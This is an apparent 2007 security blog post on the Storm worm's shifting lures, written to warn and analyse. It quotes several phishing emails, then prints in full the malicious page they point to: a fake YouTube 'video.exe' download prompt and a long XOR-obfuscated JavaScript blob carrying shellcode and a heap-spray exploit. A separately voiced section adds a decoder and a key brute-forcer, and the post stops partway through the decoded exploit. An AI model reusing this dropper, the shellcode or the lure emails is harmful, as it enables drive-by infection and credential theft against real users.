Thursday, August 23, 2007

The Ever Changing Storm

The Storm worm just keeps rolling with the punches. After you warn users, family and friends about the bogus messages and how to identify them, Storm changes it up. This time, its operators learned that users might not click on a bare IP address, so they have hidden it behind an HTML link.

Welcome,

We are glad you joined Free Ringtones.

Account Number: 895942644
Login ID: user2662
Your Password ID: zi461

For security purposes please login and change the temporary Login ID and Password.

Click on the secure link or paste it to your browser: Free Ringtones

Thank You,
Welcome Department
Free Ringtones

Or

OMG, what are you doing man. This video of you is all over the net. check it out yourself http://www.youtube.com/watch?v=pQoPSGAGXMW

or... there are just too many to include. It's quite amazing. When the messages were pr0n related with subjects like "Do you think my bra is too tight. Maybe I should take it off. let me know what you think" and "Oh man I found these pictures of my ex-secretary on her computer after I fired her. Check em out!", they all had the following in their headers:

X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

The new membership e-mails carry no mail client headers at all. The Storm worm host that the e-mail points to serves some obfuscated JavaScript with an exploit payload. Note: some of this code is going to scroll off the screen. I just couldn't figure out an elegant way of doing it, so it's just gonna look like crap. ;-)

<img src="http://www.youtube.com/img/pic_youtubelogo_123x63.gif">
<br><br>Your Download Should Begin Shortly. If your download does not start in approximately 15 seconds, you can <a href="/video.exe">click here</a> to launch the download and then press Run.

<Script Language='JavaScript'>

function xor_str(plain_str, xor_key) {
    // XOR every character code of plain_str with the single-byte key and rebuild the string
    var xored_str = "";
    for (var i = 0; i < plain_str.length; ++i)
        xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
    return xored_str;
}

var plain_str = "\xb3\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\x9e\x99\xaf\xdb\xc7\xde\xdf\xad\xaf\xdb\xd6\xd2\xd7\xad\xaf\xc0\xd0\xc1\xda\xc3\xc7\xad\xe5\xf2\xe1\xb3\xe0\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb6\xe6\xa7\xa2\xa7\xa2\xb1\xba\xa8\xf7\xfc\xe8\xe0\xb8\xae\xe0\xa8\xee\xe4\xfb\xfa\xff\xf6\xbb\xe0\xbd\xff\xf6\xfd\xf4\xe7\xfb\xaf\xa3\xeb\xa3\xaa\xa3\xa3\xa3\xa3\xa3\xba\xa8\xe0\xb8\xae\xe6\xfd\xf6\xe0\xf0\xf2\xe3\xf6\xbb\xb1\xb6\xe6\xa6\xa7\xd6\xd1\xb6\xe6\xa4\xa6\xab\xd1\xb6\xe6\xab\xd1\xa0\xd0\xb6\xe6\xa0\xa6\xa4\xa7\xb6\xe6\xa3\xa0\xa4\xab\xb6\xe6\xa6\xa5\xd5\xa6\xb6\xe6\xa4\xa5\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa3\xb6\xe6\xa0\xa0\xd5\xa6\xb6\xe6\xa7\xaa\xd0\xaa\xb6\xe6\xd2\xd7\xa7\xa2\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa3\xd5\xa0\xa5\xb6\xe6\xa2\xa7\xd1\xd6\xb6\xe6\xa0\xab\xa1\xab\xb6\xe6\xa4\xa7\xd5\xa1\xb6\xe6\xd0\xa2\xa3\xab\xb6\xe6\xa3\xd7\xd0\xd1\xb6\xe6\xd7\xd2\xa3\xa0\xb6\xe6\xd6\xd1\xa7\xa3\xb6\xe6\xa0\xd1\xd6\xd5\xb6\xe6\xa4\xa6\xd7\xd5\xb6\xe6\xa6\xd6\xd6\xa4\xb6\xe6\xa6\xd6\xab\xd1\xb6\xe6\xa3\xa0\xa1\xa7\xb6\xe6\xa5\xa5\xd7\xd7\xb6\xe6\xa3\xd0\xab\xd1\xb6\xe6\xab\xd1\xa7\xd1\xb6\xe6\xa2\xd0\xa6\xd6\xb6\xe6\xd7\xd7\xa3\xa0\xb6\xe6\xa3\xa7\xab\xd1\xb6\xe6\xa3\xa0\xab\xd1\xb6\xe6\xd0\xa0\xd0\xa6\xb6\xe6\xa4\xa1\xa4\xa
6\xb6\xe6\xa5\xd7\xa5\xd0\xb6\xe6\xa5\xd6\xa5\xd5\xb6\xe6\xa5\xa7\xa1\xd6\xb6\xe6\xa5\xd0\xa5\xd0\xb6\xe6\xa7\xa0\xa3\xa3\xb6\xe6\xa6\xd0\xa0\xd2\xb6\xe6\xa1\xd6\xa6\xa6\xb6\xe6\xa4\xab\xa5\xa6\xb6\xe6\xa3\xa3\xa5\xa6\xb6\xe6\xd0\xa3\xa0\xa0\xb6\xe6\xa3\xa0\xa5\xa7\xb6\xe6\xa0\xa3\xa7\xa3\xb6\xe6\xa3\xd0\xa4\xab\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd1\xa3\xd0\xb6\xe6\xa2\xd0\xa4\xa3\xb6\xe6\xab\xd1\xd2\xd7\xb6\xe6\xa3\xab\xa7\xa3\xb6\xe6\xa3\xaa\xd6\xd1\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xab\xd7\xa0\xa7\xb6\xe6\xa4\xd0\xa7\xa3\xb6\xe6\xa7\xa3\xab\xd1\xb6\xe6\xaa\xa6\xa0\xd0\xb6\xe6\xab\xd6\xd1\xd5\xb6\xe6\xa3\xd6\xa7\xd6\xb6\xe6\xd6\xab\xd6\xd0\xb6\xe6\xd5\xd5\xab\xa7\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd6\xd0\xab\xa0\xb6\xe6\xab\xa0\xa3\xa7\xb6\xe6\xa1\xa7\xa1\xd0\xb6\xe6\xd5\xd5\xa0\xd0\xb6\xe6\xaa\xa6\xd7\xa3\xb6\xe6\xd1\xd5\xa6\xa3\xb6\xe6\xa2\xd2\xa0\xa5\xb6\xe6\xa4\xa3\xa1\xd5\xb6\xe6\xa5\xd5\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xd1\xd5\xd5\xb6\xe6\xa1\xa7\xa6\xa7\xb6\xe6\xab\xd7\xd5\xd0\xb6\xe6\xd1\xd2\xa6\xa1\xb6\xe6\xd7\xd1\xa0\xa0\xb6\xe6\xa6\xa0\xa6\xa0\xb6\xe6\xd6\xd1\xa6\xa1\xb6\xe6\xa6\xa0\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xd1\xd5\xa6\xd7\xb6\xe6\xd5\xd6\xaa\xab\xb6\xe6\xa3\xd6\xab\xd2\xb6\xe6\xa6\xa0\xd6\xab\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xab\xa0\xd5\xd5\xb6\xe6\xa3\xa7\xd6\xd0\xb6\xe6\xa1\xd0\xab\xa0\xb6\xe6\xa5\xa1\xa1\xa7\xb6\xe6\xd7\xa3\xd5\xd5\xb6\xe6\xa4\xd6\xd1\xd5\xb6\xe6\xd6\xa1\xd7\xab\xb6\xe6\xd6\xab\xa4\xa0\xb6\xe6\xd5\xd5\xa7\xa3\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xd5\xd5\xa6\xa1\xb6\xe6\xd6\xab\xd7\xa3\xb6\xe6\xd5\xd5\xd7\xa4\xb6\xe6\xd5\xd5\xd5\xd5\xb6\xe6\xa4\xa7\xa5\xab\xb6\xe6\xa4\xa3\xa4\xa7\xb6\xe6\xa1\xd5\xa0\xd2\xb6\xe6\xa0\xab\xa1\xd5\xb6\xe6\xa1\xd6\xa0\xaa\xb6\xe6\xa0\xa0\xa0\xa7\xb6\xe6\xa0\xa2\xa1\xd6\xb6\xe6\xa0\xa5\xa0\xaa\xb6\xe6\xa0\xa6\xa1\xd6\xb6\xe6\xa5\xa5\xa1\xd5\xb6\xe6\xa5\xd0\xa5\xaa\xb6\xe6\xa1\xd6\xa5\xa6\xb6\xe6\xa5\xab\xa4\xa3\xb6\xe6\xa3\xa3\xa4\xa3\xb1\xba\xa8\xaf\xbc\xc0\xd0\xc1\xda\xc3\xc7\xad\xaf\xb
c\xdb\xd6\xd2\xd7\xad\xaf\xd1\xdc\xd7\xca\xad\xaf\xd6\xde\xd1\xd6\xd7\xb3\xc0\xc1\xd0\xae\xb1\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xb
e\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xb
e\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xb
e\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xb
e\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xbe\xd2\xd2\xd2\xd2\xd1\xd1\xd1\xd1\xd0\xd0\xd0\xd0\xd7\xd7\xd7\xd7\xd6\xd6\xd6\xd6\xd5\xd5\xd5\xd5\xd4\xd4\xd4\xd4\xdb\xdb\xdb\xdb\xda\xda\xda\xda\xd9\xd9\xd9\xd9\xd8\xd8\xd8\xd8\xdf\xdf\xdf\xdf\xd2\xd2\xd2\x96\xdd\xdd\xdd\xdd\xdc\xdc\xdc\xdc\xd2\xd2\xd2\x96\xc2\xc2\xc2\xc2\xc1\xc1\xc1\xc1\xc0\xc0\xc0\xc0\xc7\xc7\xc7\xc7\xc6\xc6\xc6\xc6\xc5\xc5\xc5\xc5\xc4\xc4\xc4\xc4\xcb\xcb\xcb\xcb\xca\xca\xca\xca\xc9\xc9\xc9\xc9\xa3\xa3\xa3\xa3\xa2\xa2\xa2\xa2\xa1\xa1\xa1\xa1\xa0\xa0\xa0\xa0\xa7\xa7\xa7\xa7\xa6\xa6\xa6\xa6\xa5\xa5\xa5\xa5\xa4\xa4\xa4\xa4\xab\xab\xab\xab\xaa\xaa\xaa\xaa\xbd\xe4\xfe\xe5\xb1\xad\xaf\xbc\xd6\xde\xd1\xd6\xd7\xad\xaf\xbc\xd1\xdc\xd7\xca\xad\xaf\xbc\xdb\xc7\xde\xdf\xad\xb3";

var xored_str = xor_str(plain_str, 147);

document.write(xored_str);
</script>
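As an added example (not code from the original post), here is how an analyst can decode a blob like this offline rather than loading the page: it reimplements xor_str over the "\xNN" literal form as it appears in the source, and brute-forces the single-byte key for the case where the key is not sitting in plain sight. The function names and the small sample page it encodes are my own constructions; only the key 147 and the literal format come from the page.

```javascript
// Added example, not code from the original post: decode a document.write()
// XOR blob offline, as an analyst would, instead of letting a browser run it.
// Reimplements the page's xor_str (key 147) over the "\xNN" literal form and
// adds single-byte key recovery for when the key is not in plain sight.

// Turn the literal body as it appears in the source ("\xb3\x9e...") into the
// string of char codes the JS engine would build from it.
function unescapeHexLiteral(literal) {
  return literal.replace(/\\x([0-9a-fA-F]{2})/g,
    (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Same operation as the page's xor_str: each char code XORed with the key.
function xorStr(str, key) {
  let out = "";
  for (let i = 0; i < str.length; i++) {
    out += String.fromCharCode(key ^ str.charCodeAt(i));
  }
  return out;
}

// Fraction of printable ASCII (plus CR/LF/TAB) in a candidate plaintext.
function printableRatio(str) {
  let ok = 0;
  for (let i = 0; i < str.length; i++) {
    const c = str.charCodeAt(i);
    if ((c >= 0x20 && c < 0x7f) || c === 0x0a || c === 0x0d || c === 0x09) ok++;
  }
  return str.length ? ok / str.length : 0;
}

// Try all 256 keys; a candidate that is mostly printable AND contains markup
// (this dropper decodes to an HTML page) wins. Returns { key, text }.
function recoverKey(literal) {
  const raw = unescapeHexLiteral(literal);
  let best = { key: -1, text: "", score: -1 };
  for (let key = 0; key < 256; key++) {
    const text = xorStr(raw, key);
    let score = printableRatio(text);
    if (/<html|<script|<embed/i.test(text)) score += 1;
    if (score > best.score) best = { key, text, score };
  }
  return { key: best.key, text: best.text };
}

// Encoder used only to build a constructed sample in the same "\xNN" form
// the Storm page used (a small page of our own, not the page's payload).
function toHexLiteral(str, key) {
  return xorStr(str, key).split("")
    .map(ch => "\\x" + ch.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}
const SAMPLE_HTML = '<HTML><SCRIPT>var s="x";</SCRIPT><EMBED SRC="a.wmv"></EMBED></HTML>';
const SAMPLE_LITERAL = toHexLiteral(SAMPLE_HTML, 147);  // starts with "\xaf\xdb"
```

Under key 147 the sample literal begins with the same "\xaf\xdb" bytes as the page's blob does at its "<HTML>" tag, which is a quick sanity check that the key is right before decoding the whole thing.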

Which decodes to:

<SCRIPT>
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);
